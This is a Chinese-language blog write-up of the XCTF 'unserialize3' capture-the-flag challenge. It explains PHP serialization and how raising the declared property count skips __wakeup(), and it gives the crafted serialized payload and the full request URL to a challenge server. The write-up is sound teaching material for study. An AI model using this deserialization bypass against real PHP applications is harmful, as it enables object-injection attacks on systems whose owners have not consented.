php反序列化-unserialize3
2021/7/6 1:29:47
本文主要是介绍php反序列化-unserialize3,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
目录- unserialize3-php反序列化
- unserialize3
unserialize3-php反序列化
unserialize3
-
环境地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4821&page=1
-
打开代码
class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code=
_wakeup经常用在反序列化操作中,例如重新建立数据库连接,或执行其他初始化操作。所以猜测被反序列化了
但是这里看到这里没有特别对哪个字符串序列化,所以把xctf类实例化后,进行反序列化利用php中的new运算符,实例化类xctf
new是申请空间的操作符,一般用于类
比如定义了一个class a{public i=0;}
$c = new a(); 相当于定义了一个基于a类的对象,这时候 $c->i 就是0
(参考https://zhidao.baidu.com/question/495110936393795804.html)
写一段php代码执行(网上就有php代码在线执行)
<?php class xctf{ //类 public $flag = '111';//public定义flag变量公开可见 public function __wakeup(){ exit('bad requests'); } } $a=new xctf(); echo(serialize($a)); ?>
得出结果
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
如果直接传参给code会被_wakeup()函数再次序列号,所以要绕过他,利用 _wakeup函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过 _wakeup的执行。
序列化返回的字符串格式:
O:<length>:"<class name>":<n>:{<field name 1><field value 1>...<field name n><field value n>}
-
O:表示序列化的是对象
-
:表示序列化的类名称长度 -
:表示序列化的类的名称 -
:表示被序列化的对象的属性个数 -
<field name 1>:属性名
-
<field value 1>:属性值
所以要修改属性个数
O:4:"xctf":2:{s:4:"flag";s:3:"111";}
传参给code,得到flag:
http://111.200.241.244:61154/index.php?code=O:4:%22xctf%22:2:{s:4:%22flag%22;s:3:%22111%22;}
这篇关于php反序列化-unserialize3的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-03-29env: php: no such file or directory
- 2024-03-01php foreach break
- 2024-02-26Exception参数 php-icode9专业技术文章分享
- 2023-12-30PHP文件批量上传-icode9专业技术文章分享
- 2023-12-30thinkphp6 withJoin-icode9专业技术文章分享
- 2023-12-27MagicArray:像php一样,让Go业务代码不再卷!
- 2023-11-18centos7编译安装PHP教程。
- 2023-11-18centos7编译安装phpMyAdmin教程。
- 2023-10-13唱衰这么多年,PHP 仍然还是你大爷!
- 2023-07-25PHP8,性能更好,语法更好,类型安全更完善